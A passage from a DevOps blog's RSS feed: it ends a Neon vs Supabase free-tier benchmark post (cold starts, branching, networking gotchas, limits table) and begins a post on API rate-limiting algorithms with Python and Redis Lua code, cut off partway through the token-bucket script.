<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Neon cold start: first query against suspended compute&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;20 suspend/wake cycles. Neon documents 300-500 ms as typical.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;wake query&quot;,&quot;samples&quot;:[576.9,580.3,1553.8,567.7,563.1,572.8,557.8,571,567.1,557.3,562.6,573.4,558.3,554.5,566.3,565.1,586.9,571.7,583.1,1061.9]}]}"></div><p>Neon&#39;s docs say cold starts are &quot;typically a few hundred milliseconds&quot; with 500 ms as the usual ceiling. Measured from a same-region client, reality is a bit slower: our median sat just above their typical ceiling, and the p95 crossed a full second. Not bad, just not quite the brochure. For a hobby app behind a page load, an occasional extra half second on the first request after a quiet stretch is invisible. For a latency-sensitive API that gets sparse traffic, it is a real consideration.</p>
<p><strong>Supabase</strong> free compute never naps; your project runs a dedicated instance around the clock, so there are no cold starts at all. Instead, after 7 days without activity, the whole project is <strong>paused</strong>. A paused project does not wake on connection. You log into the dashboard and restore it manually, which takes on the order of minutes, and until you do, every connection fails outright.</p>
<p>So the trade is: Neon costs you ~570 ms after every 5 quiet minutes but never needs you; Supabase costs you nothing while active but a manual rescue if you ever leave it alone for a week. For a demo you show twice a month, that 7-day pause is the difference between &quot;works when the customer clicks&quot; and &quot;dead link in your portfolio.&quot;</p>
<h2 id="h2-branching-only-one-of-them-brings-the-data" class="group relative scroll-mt-24">
        <a href="#h2-branching-only-one-of-them-brings-the-data" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Branching: only one of them brings the data
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-branching-only-one-of-them-brings-the-data"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Database branching is the headline feature of serverless Postgres, and on free tiers it is not a comparison, because only Neon has it there. We branched a project carrying 100,000 seeded rows, 10 times:</p>
<ul>
<li>Writable branch, parent&#39;s full dataset included, queryable: <strong>2.2 s median, 3.2 s p95</strong>.</li>
</ul>
<p>One honest nuance the marketing skips: the copy-on-write storage operation itself is effectively instant, but a usable branch needs its own compute endpoint, and provisioning that is where the 2 seconds go. &quot;Branches in milliseconds&quot; is true at the storage layer and false at the connection string. What you actually get is a full writable copy of a database, with data, in about the time it takes to read this sentence, which is still excellent and still the same primitive that makes per-PR preview databases and agent test loops practical.</p>
<p>Supabase shipped Branching 2.0 in 2025 (Git optional, branch from the dashboard or API), but it requires a paid plan, each branch bills as its own compute, and branches copy schema and config without production data. We will measure it properly in the paid-tier article.</p>
<h2 id="h2-the-networking-fine-print-nobody-tells-you" class="group relative scroll-mt-24">
        <a href="#h2-the-networking-fine-print-nobody-tells-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The networking fine print nobody tells you
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-networking-fine-print-nobody-tells-you"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Three things we hit while building the harness that will absolutely hit you too:</p>
<p><strong>1. Supabase free direct connections are IPv6-only.</strong> <code>db.&lt;ref&gt;.supabase.co</code> has no A record, only AAAA. If your client is IPv4-only, and that includes most CI runners, many cloud VMs by default, and most home ISPs, you cannot reach the direct host at all. You connect through Supavisor instead: session mode on port 5432, transaction mode on 6543. Both pooler paths carry IPv4. (A dedicated IPv4 address for direct connections exists as a paid add-on.) Neon&#39;s endpoints answer on both stacks.</p>
<p><strong>2. The Supabase pooler hostname varies per project.</strong> Our first project landed on <code>aws-1-eu-central-1.pooler.supabase.com</code> while the documented examples reference <code>aws-0-...</code>. Both exist. Do not hardcode the pooler host from a tutorial; read your project&#39;s connection info from the dashboard or the Management API.</p>
<p><strong>3. Supabase database TLS chains to Supabase&#39;s own CA.</strong> The certs are not signed by a public authority, so a client that verifies certificates (which should be all of them) needs <a href="https://supabase.com/docs/guides/platform/ssl-enforcement">their root certificate</a>. And if you use node-postgres, there is a trap inside the trap: when your connection string contains <code>sslmode=require</code>, <code>pg</code> silently ignores the <code>ssl</code> options object where you so carefully loaded that CA file, and verification fails with <code>self-signed certificate in certificate chain</code>. Drop <code>sslmode</code> from the URL and configure TLS exclusively through the <code>ssl</code> option. That one cost us an hour; it is yours for free.</p>
<p>None of these are dealbreakers. All three are the kind of thing you want to know on a Tuesday afternoon rather than discover during a Friday deploy.</p>
<h2 id="h2-the-limits-side-by-side" class="group relative scroll-mt-24">
        <a href="#h2-the-limits-side-by-side" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The limits, side by side
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-limits-side-by-side"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The measured behavior above, plus the caps that matter, as of June 2026:</p>
<table>
<thead>
<tr>
<th></th>
<th>Neon free</th>
<th>Supabase free</th>
</tr>
</thead>
<tbody><tr>
<td>Database storage</td>
<td>0.5 GB per project</td>
<td>500 MB</td>
</tr>
<tr>
<td>Projects</td>
<td>up to 100</td>
<td>2 active</td>
</tr>
<tr>
<td>Compute</td>
<td>100 CU-hours/project/month, autoscaling to 2 CU</td>
<td>dedicated Nano instance, always on</td>
</tr>
<tr>
<td>Idle behavior</td>
<td>scales to zero after 5 min, auto-wakes in ~570 ms</td>
<td>project pauses after 7 days, manual restore</td>
</tr>
<tr>
<td>Branching</td>
<td>10 branches/project, data included, ~2.2 s</td>
<td>not available</td>
</tr>
<tr>
<td>Restore window</td>
<td>6 hours</td>
<td>none (daily backups start on Pro)</td>
</tr>
<tr>
<td>Extras</td>
<td></td>
<td>Auth (50K MAU), storage (1 GB), edge functions (500K), realtime</td>
</tr>
<tr>
<td>Direct connection</td>
<td>IPv4 + IPv6</td>
<td>IPv6 only (pooler for IPv4)</td>
</tr>
</tbody></table>
<h2 id="h2-which-free-tier-should-you-pick" class="group relative scroll-mt-24">
        <a href="#h2-which-free-tier-should-you-pick" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Which free tier should you pick?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-which-free-tier-should-you-pick"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The latency tie makes this refreshingly simple: pick on shape, not speed.</p>
<p><strong>Pick Neon&#39;s free tier when the database is the product.</strong> Side projects with irregular traffic (auto-wake beats manual restore), anything that needs many databases (100 projects vs 2), CI and preview environments (branching with data is free-tier-exclusive), and agent or automation workflows that create and destroy databases programmatically.</p>
<p><strong>Pick Supabase&#39;s free tier when you are shipping an app, not a database.</strong> The bundled auth, storage, realtime, and auto-generated APIs replace three or four other free tiers you would otherwise stitch together, and 50K monthly active users of free auth is genuinely hard to beat. Just put a calendar reminder somewhere if the project might go quiet for a week.</p>
<p>One forward-looking note: in June 2026 Neon announced S3-compatible object storage that branches with the database, serverless functions, and an AI gateway, all marked coming soon. If those ship, the bundled-stack gap narrows; we will rerun this comparison when they do.</p>
<p>And if you are still torn, the structural differences run deeper than the free tiers: we maintain a full <a href="https://devops-daily.com/comparisons/neon-vs-supabase">Neon vs Supabase comparison</a> covering architecture, pricing models, PITR, and the paid features side by side.</p>
<h2 id="h2-where-the-series-goes-next" class="group relative scroll-mt-24">
        <a href="#h2-where-the-series-goes-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where the series goes next
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-the-series-goes-next"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This post is part one. The free tiers are where you start, but the interesting differences show up when money and production traffic enter the picture, so we kept going:</p>
<ul>
<li><a href="https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks">Part two: operational benchmarks</a> times the operations that page you: compute resize (and its downtime), branching at scale, read replicas, point-in-time restore, and 200-connection stampedes, on the paid tiers.</li>
<li><a href="https://devops-daily.com/posts/neon-vs-supabase-scaling-costs">Part three: scaling costs</a> prices the same application through five growth stages on both platforms, with an open source cost model you can rerun on your own workload.</li>
</ul>
<h2 id="h2-run-it-yourself" class="group relative scroll-mt-24">
        <a href="#h2-run-it-yourself" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Run it yourself
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-run-it-yourself"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Every number in this post is the median of committed raw samples. The <a href="https://postgres-benchmarks.devops-daily.com/">live dashboard</a> tracks every benchmark session (the charts there update as new runs land, including a latency-over-time view), and the harness behind it is about 600 lines of TypeScript: <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">The-DevOps-Daily/serverless-postgres-benchmarks</a>. Bring your own API keys, <code>npm run bench</code>, and argue with our data instead of someone&#39;s vibes.</p>
<p>These benchmarks are fully open source, and contributions are welcome. If you spot something off in the methodology, know a fairer way to measure an operation, or get different numbers from another region or another month, open an issue or send a pull request to <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">the repo</a>. The whole point of publishing the harness and every raw sample is that this comparison can be checked, challenged, and improved by anyone, instead of being remembered as a vibe.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Designing Rate Limiting for APIs: Algorithms, Patterns, and Implementation]]></title>
      <link>https://devops-daily.com/posts/designing-rate-limiting-for-apis</link>
      <description><![CDATA[A practical comparison of token bucket, leaky bucket, fixed window, and sliding window rate limiting, with copy-paste Redis and FastAPI code, nginx config, and guidance on which one to actually use.]]></description>
      <pubDate>Mon, 08 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/designing-rate-limiting-for-apis</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[api-design]]></category><category><![CDATA[rate-limiting]]></category><category><![CDATA[backend]]></category><category><![CDATA[redis]]></category><category><![CDATA[nginx]]></category><category><![CDATA[devops]]></category>
      <content:encoded><![CDATA[<p>At 2am a single customer&#39;s cron job got stuck in a retry loop with no backoff. One API key started sending around 8,000 requests per second. Within ninety seconds the database connection pool was saturated, every other customer was getting timeouts, and the on-call engineer was staring at a dashboard that was all red. There was no rate limiting on that endpoint. One misbehaving client took down the API for everyone.</p>
<p>If you run any public or shared API, this is not a hypothetical. The fix is rate limiting, and the hard part is not the idea, it is picking the right algorithm and implementing it so it actually holds up behind a load balancer.</p>
<p>This post compares the four rate limiting algorithms you will actually see in production (fixed window, sliding window, token bucket, leaky bucket), shows you working code you can copy, and gives you a straight answer on which one to use.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><strong>Token bucket</strong> is the right default for most public APIs. It allows controlled bursts and is cheap to run in Redis.</li>
<li><strong>Sliding window counter</strong> is the best choice when you want accurate limits without the boundary-burst problem of fixed windows.</li>
<li><strong>Fixed window</strong> is the simplest and cheapest, but it lets a client send up to 2x your limit across a window boundary. Fine for rough internal limits, bad for billing or abuse control.</li>
<li><strong>Leaky bucket</strong> smooths bursty input into a constant output rate. Use it when a downstream system can only handle a fixed throughput, not when you want to allow bursts.</li>
<li>Do the counting in a shared store (Redis) with an atomic operation. In-memory counters break the moment you run more than one instance.</li>
<li>Return <code>429 Too Many Requests</code> with a <code>Retry-After</code> header. Decide up front whether you fail open or fail closed when Redis is down.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A running API service (the examples use Python and FastAPI, but the logic ports to any language)</li>
<li>Redis 6 or newer reachable from your service, for distributed counting</li>
<li>Basic familiarity with HTTP status codes and headers</li>
<li><code>redis-py</code> installed (<code>pip install redis</code>) if you want to run the Python examples</li>
</ul>
<h2 id="h2-why-in-memory-counters-fail-first" class="group relative scroll-mt-24">
        <a href="#h2-why-in-memory-counters-fail-first" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why in-memory counters fail first
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-in-memory-counters-fail-first"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Before the algorithms, the trap everyone hits. The naive version looks like this:</p>
<pre><code class="hljs language-python"><span class="hljs-comment"># DO NOT use this in production</span>
<span class="hljs-keyword">from</span> collections <span class="hljs-keyword">import</span> defaultdict
<span class="hljs-keyword">import</span> time

counters = defaultdict(<span class="hljs-built_in">list</span>)

<span class="hljs-keyword">def</span> <span class="hljs-title function_">allow</span>(<span class="hljs-params">client_id, limit=<span class="hljs-number">100</span>, window=<span class="hljs-number">60</span></span>):
    now = time.time()
    counters[client_id] = [t <span class="hljs-keyword">for</span> t <span class="hljs-keyword">in</span> counters[client_id] <span class="hljs-keyword">if</span> t &gt; now - window]
    <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(counters[client_id]) &gt;= limit:
        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span>
    counters[client_id].append(now)
    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre><p>This works on your laptop and fails in production for one reason: the counter lives in the memory of a single process. Run three replicas behind a load balancer and each one tracks its own count, so your &quot;100 requests per minute&quot; limit becomes 300. Restart a pod and the counter resets. Autoscale to ten pods and the limit is meaningless.</p>
<p>Rate limiting state has to live somewhere shared and the check has to be atomic. That is why every serious example below uses Redis.</p>
<h2 id="h2-the-four-algorithms" class="group relative scroll-mt-24">
        <a href="#h2-the-four-algorithms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The four algorithms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-four-algorithms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-fixed-window-counter" class="group relative scroll-mt-24">
        <a href="#h3-fixed-window-counter" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Fixed window counter
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-fixed-window-counter"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Count requests in a fixed time block (say, per calendar minute). When the clock ticks over to the next minute, the count resets to zero.</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">fixed_window</span>(<span class="hljs-params">redis, key, limit, window</span>):
    count = redis.incr(key)
    <span class="hljs-keyword">if</span> count == <span class="hljs-number">1</span>:
        <span class="hljs-comment"># first request in this window, set the expiry</span>
        redis.expire(key, window)
    <span class="hljs-keyword">return</span> count &lt;= limit
</code></pre><p>It is fast, uses almost no memory (one integer per client), and is trivial to reason about. The problem is the boundary. A client can send <code>limit</code> requests in the last second of one window and another <code>limit</code> in the first second of the next:</p>
<pre><code class="hljs language-text">window 1 (00:00-00:59)                window 2 (01:00-01:59)
                          |&lt;- 1 second -&gt;|
            100 reqs at 00:59.5    100 reqs at 01:00.2
            = 200 requests in ~0.7 seconds
</code></pre><p>For a limit that maps to real cost (database load, a paid quota), that 2x burst is a real bug. Use fixed window only for rough limits where the occasional double burst does not hurt you.</p>
<h3 id="h3-sliding-window-log" class="group relative scroll-mt-24">
        <a href="#h3-sliding-window-log" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Sliding window log
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-sliding-window-log"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Keep a timestamp for every request and count how many fall inside the trailing window. This is exact, no boundary problem, but you store one entry per request. A client at 1,000 requests per minute means 1,000 timestamps in memory per client. That cost adds up fast across many clients, so reserve the sliding log for low-volume endpoints where precision matters (think a &quot;5 password resets per hour&quot; rule).</p>
<h3 id="h3-sliding-window-counter" class="group relative scroll-mt-24">
        <a href="#h3-sliding-window-counter" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Sliding window counter
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-sliding-window-counter"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The practical middle ground. Keep a counter per fixed window, then estimate the rolling count by weighting the previous window by how much of it still overlaps the trailing period.</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">import</span> time

<span class="hljs-keyword">def</span> <span class="hljs-title function_">sliding_window</span>(<span class="hljs-params">redis, key, limit, window</span>):
    now = time.time()
    current = <span class="hljs-built_in">int</span>(now // window)
    previous = current - <span class="hljs-number">1</span>
    <span class="hljs-comment"># how far we are into the current window, as a fraction</span>
    elapsed = (now % window) / window

    cur_count = <span class="hljs-built_in">int</span>(redis.get(<span class="hljs-string">f&quot;<span class="hljs-subst">{key}</span>:<span class="hljs-subst">{current}</span>&quot;</span>) <span class="hljs-keyword">or</span> <span class="hljs-number">0</span>)
    prev_count = <span class="hljs-built_in">int</span>(redis.get(<span class="hljs-string">f&quot;<span class="hljs-subst">{key}</span>:<span class="hljs-subst">{previous}</span>&quot;</span>) <span class="hljs-keyword">or</span> <span class="hljs-number">0</span>)

    <span class="hljs-comment"># weighted estimate of requests in the trailing window</span>
    estimated = prev_count * (<span class="hljs-number">1</span> - elapsed) + cur_count
    <span class="hljs-keyword">if</span> estimated &gt;= limit:
        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span>

    pipe = redis.pipeline()
    pipe.incr(<span class="hljs-string">f&quot;<span class="hljs-subst">{key}</span>:<span class="hljs-subst">{current}</span>&quot;</span>)
    pipe.expire(<span class="hljs-string">f&quot;<span class="hljs-subst">{key}</span>:<span class="hljs-subst">{current}</span>&quot;</span>, window * <span class="hljs-number">2</span>)
    pipe.execute()
    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre><p>This gives you accuracy very close to a true sliding window at the cost of two integers per client. It smooths out the boundary burst because the previous window&#39;s count still pulls weight right after the rollover. This is a solid default if token bucket does not fit your mental model.</p>
<h3 id="h3-token-bucket" class="group relative scroll-mt-24">
        <a href="#h3-token-bucket" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Token bucket
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-token-bucket"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Picture a bucket that holds tokens. Every request takes one token. Tokens refill at a steady rate up to a maximum capacity. If the bucket is empty, the request is rejected.</p>
<pre><code class="hljs language-text">        refill at 10 tokens/sec
                 |
                 v
        +------------------+
        |  tokens: 73/100  |   capacity = 100 (max burst)
        +------------------+
                 |
          1 token per request
                 v
            request allowed
</code></pre><p>The capacity controls how big a burst you allow; the refill rate controls the sustained throughput. A client that has been quiet can spend its full bucket at once (a burst), then is held to the refill rate. This matches how people actually use APIs, which is why most public APIs (Stripe, GitHub, AWS) use token bucket or a close variant.</p>
<p>The catch is that refill and spend have to be atomic, or two concurrent requests can both read the same token count and both spend it. Do it in a single Redis Lua script so the whole read-refill-spend cycle runs without interruption:</p>
<pre><code class="hljs language-lua"><span class="hljs-comment">-- token_bucket.lua</span>
<span class="hljs-comment">-- KEYS[1] = bucket key</span>
<span class="hljs-comment">-- ARGV[1] = capacity</span>
<span class="hljs-comment">-- ARGV[2] = refill rate (tokens per second)</span>
<span class="hljs-comment">-- ARGV[3] = current time (seconds, with fraction)</span>
<span class="hljs-comment">-- ARGV[4] = tokens requested (cost)</span>
<span class="hljs-keyword">local</span> capacity = <span class="hljs-built_in">tonumber</span>(ARGV[<span class="hljs-number">1</span>])
<span class="hljs-keyword">local</span> refill_rate = <span class="hljs-built_in">tonumber</span>(ARGV[<span class="hljs-number">2</span>])
<span class="hljs-keyword">local</span> now = <span class="hljs-built_in">tonumber</span>(ARGV[<span class="hljs-number">3</span>])
<span class="hljs-keyword">local</span> requested = <span class="hljs-built_in">tonumber</span>(ARGV[<span class="hljs-number">4</span>])

<span class="hljs-keyword">local</span> bucket = redis.call(<span class="hljs-string">&#x27;HMGET&#x27;</span>, KEYS[<span class="hljs-number">1</span>], <span class="hljs-string">&#x27;tokens&#x27;</span>, <span class="hljs-string">&#x27;last&#x27;</span>)
<span class="hljs-keyword">local</span> tokens = <span class="hljs-built_in">tonumber</span>(bucket[<span class="hljs-number">1</span>])
<span class="hljs-keyword">local</span> last = <span class="hljs-built_in">tonumber</span>(bucket[<span class="hljs-number">2</span>])

<span class="hljs-keyword">if</span> tokens == <span class="hljs-literal">nil</span> <span class="hljs-keyword">then</span>
  tokens = capacity
  last = now
<span class="hljs-keyword">end</span>

<span class="hljs-comment">-- refill based on time elapsed since the last request</span>
